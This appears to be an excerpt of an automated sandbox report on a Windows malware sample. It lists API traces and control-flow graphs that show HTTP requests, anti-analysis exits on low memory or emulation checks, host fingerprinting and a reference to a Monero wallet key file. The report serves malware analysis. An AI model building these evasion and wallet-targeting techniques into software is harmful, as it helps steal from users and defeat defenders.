                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • InternetOpenA.WININET(00BC0DFE,00000001,00000000,00000000,00000000), ref: 00BA62E1
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA6385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA63BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA63D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BA63FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA64EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA64F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: a036f7d268ab6b7e7359d73b28229eac48a8dd0bced2fd1808ea1a302bf92803
                                  • Instruction ID: 8630e090f82bdc673d2df07bbb457967e203efb4d3ab94e0bf8c21900b2f7454
                                  • Opcode Fuzzy Hash: a036f7d268ab6b7e7359d73b28229eac48a8dd0bced2fd1808ea1a302bf92803
                                  • Instruction Fuzzy Hash: 88713071A04318ABDB24EBA4CC95FEE77B4FB45700F108198F509AB690DBB46A85CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 bb5510-bb5577 call bb5ad0 call bba820 * 3 call bba740 * 4 1106 bb557c-bb5583 1090->1106 1107 bb55d7-bb564c call bba740 * 2 call ba1590 call bb52c0 call bba8a0 call bba800 call bbaad0 StrCmpCA 1106->1107 1108 bb5585-bb55b6 call bba820 call bba7a0 call ba1590 call bb51f0 1106->1108 1134 bb5693-bb56a9 call bbaad0 StrCmpCA 1107->1134 1138 bb564e-bb568e call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1107->1138 1124 bb55bb-bb55d2 call bba8a0 call bba800 1108->1124 1124->1134 1139 bb56af-bb56b6 1134->1139 1140 bb57dc-bb5844 call bba8a0 call bba820 * 2 call ba1670 call bba800 * 4 call bb6560 call ba1550 1134->1140 1138->1134 1143 bb57da-bb585f call bbaad0 StrCmpCA 1139->1143 1144 bb56bc-bb56c3 1139->1144 1270 bb5ac3-bb5ac6 1140->1270 1162 bb5991-bb59f9 call bba8a0 call bba820 * 2 call ba1670 call bba800 * 4 call bb6560 call ba1550 1143->1162 1163 bb5865-bb586c 1143->1163 1147 bb571e-bb5793 call bba740 * 2 call ba1590 call bb52c0 call bba8a0 call bba800 call bbaad0 StrCmpCA 1144->1147 1148 bb56c5-bb5719 call bba820 call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1144->1148 1147->1143 1249 bb5795-bb57d5 call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1147->1249 1148->1143 1162->1270 1170 bb598f-bb5a14 call bbaad0 StrCmpCA 1163->1170 1171 bb5872-bb5879 1163->1171 1199 bb5a28-bb5a91 call bba8a0 call bba820 * 2 call ba1670 call bba800 * 4 call bb6560 call ba1550 1170->1199 1200 bb5a16-bb5a21 Sleep 1170->1200 1178 bb587b-bb58ce call bba820 call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1171->1178 1179 bb58d3-bb5948 call bba740 * 2 call ba1590 call bb52c0 call bba8a0 call bba800 call bbaad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 bb594a-bb598a call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                                  APIs
                                    • Part of subcall function 00BBA820: lstrlen.KERNEL32(00BA4F05,?,?,00BA4F05,00BC0DDE), ref: 00BBA82B
                                    • Part of subcall function 00BBA820: lstrcpy.KERNEL32(00BC0DDE,00000000), ref: 00BBA885
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB56A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5857
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BB51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5228
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5318
                                    • Part of subcall function 00BB52C0: lstrlen.KERNEL32(00000000), ref: 00BB532F
                                    • Part of subcall function 00BB52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00BB5364
                                    • Part of subcall function 00BB52C0: lstrlen.KERNEL32(00000000), ref: 00BB5383
                                    • Part of subcall function 00BB52C0: lstrlen.KERNEL32(00000000), ref: 00BB53AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00BB5A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: e8704c51e0b7805e00de0bd9f51b55ce80eefc9ec45fdc74754a3ea326bc4dca
                                  • Instruction ID: f8dfe0a843ef9fada4480a096684ddb0bdf44a2e71f3dc0bcb88fd31115d18ca
                                  • Opcode Fuzzy Hash: e8704c51e0b7805e00de0bd9f51b55ce80eefc9ec45fdc74754a3ea326bc4dca
                                  • Instruction Fuzzy Hash: 3BE1F271D10204ABCB14FBA4DC96EFD77BCAF54300F5085A8B506A6591EFB46E09CBA3

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 bb17a0-bb17cd call bbaad0 StrCmpCA 1304 bb17cf-bb17d1 ExitProcess 1301->1304 1305 bb17d7-bb17f1 call bbaad0 1301->1305 1309 bb17f4-bb17f8 1305->1309 1310 bb17fe-bb1811 1309->1310 1311 bb19c2-bb19cd call bba800 1309->1311 1313 bb199e-bb19bd 1310->1313 1314 bb1817-bb181a 1310->1314 1313->1309 1316 bb187f-bb1890 StrCmpCA 1314->1316 1317 bb185d-bb186e StrCmpCA 1314->1317 1318 bb1913-bb1924 StrCmpCA 1314->1318 1319 bb1932-bb1943 StrCmpCA 1314->1319 1320 bb18f1-bb1902 StrCmpCA 1314->1320 1321 bb1951-bb1962 StrCmpCA 1314->1321 1322 bb1970-bb1981 StrCmpCA 1314->1322 1323 bb1835-bb1844 call bba820 1314->1323 1324 bb1849-bb1858 call bba820 1314->1324 1325 bb18cf-bb18e0 StrCmpCA 1314->1325 1326 bb198f-bb1999 call bba820 1314->1326 1327 bb18ad-bb18be StrCmpCA 1314->1327 1328 bb1821-bb1830 call bba820 1314->1328 1346 bb189e-bb18a1 1316->1346 1347 bb1892-bb189c 1316->1347 1344 bb187a 1317->1344 1345 bb1870-bb1873 1317->1345 1331 bb1930 1318->1331 1332 bb1926-bb1929 1318->1332 1333 bb194f 1319->1333 1334 bb1945-bb1948 1319->1334 1329 bb190e 1320->1329 1330 bb1904-bb1907 1320->1330 1335 bb196e 1321->1335 1336 bb1964-bb1967 1321->1336 1338 bb198d 1322->1338 1339 bb1983-bb1986 1322->1339 1323->1313 1324->1313 1350 bb18ec 1325->1350 1351 bb18e2-bb18e5 1325->1351 1326->1313 1348 bb18ca 1327->1348 1349 bb18c0-bb18c3 1327->1349 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 bb18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00BB17C5
                                  • ExitProcess.KERNEL32 ref: 00BB17D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: e08620cb862ef5d03fa75ab84f6d3247736296c39bccf1e32b30a2bf335edc9a
                                  • Instruction ID: 5b435164732a5766dcf74b0eb4a7d9ebf89e2a6558209711100c0b098692db05
                                  • Opcode Fuzzy Hash: e08620cb862ef5d03fa75ab84f6d3247736296c39bccf1e32b30a2bf335edc9a
                                  • Instruction Fuzzy Hash: CB514174A10249EBCB04DFA8D9A4BFE77F5BF44744F504498E446AB250D7B0E942CB62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 bb7500-bb754a GetWindowsDirectoryA 1357 bb754c 1356->1357 1358 bb7553-bb75c7 GetVolumeInformationA call bb8d00 * 3 1356->1358 1357->1358 1365 bb75d8-bb75df 1358->1365 1366 bb75fc-bb7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 bb75e1-bb75fa call bb8d00 1365->1367 1369 bb7619-bb7626 call bba740 1366->1369 1370 bb7628-bb7658 wsprintfA call bba740 1366->1370 1367->1365 1377 bb767e-bb768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BB7542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BB757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB760A
                                  • wsprintfA.USER32 ref: 00BB7640
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 35358d48b9647aead2b59814575d3659be9999d2d8cd0325ccd5c179c054040d
                                  • Instruction ID: 14f9be86a09e8238899849bdafb8d255d630b17b3a84edea83a5d2502926a4c1
                                  • Opcode Fuzzy Hash: 35358d48b9647aead2b59814575d3659be9999d2d8cd0325ccd5c179c054040d
                                  • Instruction Fuzzy Hash: 4E4185B1D44348ABDF10DF98DC95BEEBBB8EF58700F100199F505AB280DBB46A44CBA5

                                  APIs
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401A38), ref: 00BB98A1
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401918), ref: 00BB98BA
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014018B8), ref: 00BB98D2
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401768), ref: 00BB98EA
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014018E8), ref: 00BB9903
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01409C60), ref: 00BB991B
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,013F5428), ref: 00BB9933
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,013F55E8), ref: 00BB994C
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401750), ref: 00BB9964
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014018A0), ref: 00BB997C
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401930), ref: 00BB9995
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014017C8), ref: 00BB99AD
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,013F53A8), ref: 00BB99C5
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401948), ref: 00BB99DE
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BA11D0: ExitProcess.KERNEL32 ref: 00BA1211
                                    • Part of subcall function 00BA1160: GetSystemInfo.KERNEL32(?), ref: 00BA116A
                                    • Part of subcall function 00BA1160: ExitProcess.KERNEL32 ref: 00BA117E
                                    • Part of subcall function 00BA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                    • Part of subcall function 00BA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                    • Part of subcall function 00BA1110: ExitProcess.KERNEL32 ref: 00BA1143
                                    • Part of subcall function 00BA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1258
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1266
                                    • Part of subcall function 00BA1220: ExitProcess.KERNEL32 ref: 00BA1294
                                    • Part of subcall function 00BB6770: GetUserDefaultLangID.KERNEL32 ref: 00BB6774
                                    • Part of subcall function 00BA1190: ExitProcess.KERNEL32 ref: 00BA11C6
                                    • Part of subcall function 00BB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7880
                                    • Part of subcall function 00BB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7887
                                    • Part of subcall function 00BB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB789F
                                    • Part of subcall function 00BB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7910
                                    • Part of subcall function 00BB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7917
                                    • Part of subcall function 00BB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB792F
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6AF9
                                  • Sleep.KERNEL32(00001770), ref: 00BB6B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6B1A
                                  • ExitProcess.KERNEL32 ref: 00BB6B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 0b706494cf7966cbb54327d82c5672bbb0e640e548bb9a5460049d7910ce55f0
                                  • Instruction ID: 9cb356491868d832aa3acef5e7c588e1de6b24b8d825fb6b3c17a6fd054fa7bf
                                  • Opcode Fuzzy Hash: 0b706494cf7966cbb54327d82c5672bbb0e640e548bb9a5460049d7910ce55f0
                                  • Instruction Fuzzy Hash: B0312870D04209ABDB04FBE4DC96BFE77B8AF04300F504598F212B6192EFB46905C6A2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 ba1220-ba1247 call bb89b0 GlobalMemoryStatusEx 1439 ba1249-ba1271 call bbda00 * 2 1436->1439 1440 ba1273-ba127a 1436->1440 1442 ba1281-ba1285 1439->1442 1440->1442 1444 ba129a-ba129d 1442->1444 1445 ba1287 1442->1445 1447 ba1289-ba1290 1445->1447 1448 ba1292-ba1294 ExitProcess 1445->1448 1447->1444 1447->1448
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                  • __aulldiv.LIBCMT ref: 00BA1258
                                  • __aulldiv.LIBCMT ref: 00BA1266
                                  • ExitProcess.KERNEL32 ref: 00BA1294
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 3e5d1f91bb1899be6e9434829c64072e296a3cdc13c77adc01ed5c9379c0e492
                                  • Instruction ID: 0704543641d70a4fd07931903923bc01024fa7ea1860a153fae5e92ac7f6feac
                                  • Opcode Fuzzy Hash: 3e5d1f91bb1899be6e9434829c64072e296a3cdc13c77adc01ed5c9379c0e492
                                  • Instruction Fuzzy Hash: 810112B0D44308BBEF50EFD8CC89BADBBB8EB15705F248494E705BA2C0D7B495458B99

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 bb6af3 1451 bb6b0a 1450->1451 1453 bb6aba-bb6ad7 call bbaad0 OpenEventA 1451->1453 1454 bb6b0c-bb6b22 call bb6920 call bb5b10 CloseHandle ExitProcess 1451->1454 1460 bb6ad9-bb6af1 call bbaad0 CreateEventA 1453->1460 1461 bb6af5-bb6b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6AF9
                                  • Sleep.KERNEL32(00001770), ref: 00BB6B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6B1A
                                  • ExitProcess.KERNEL32 ref: 00BB6B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
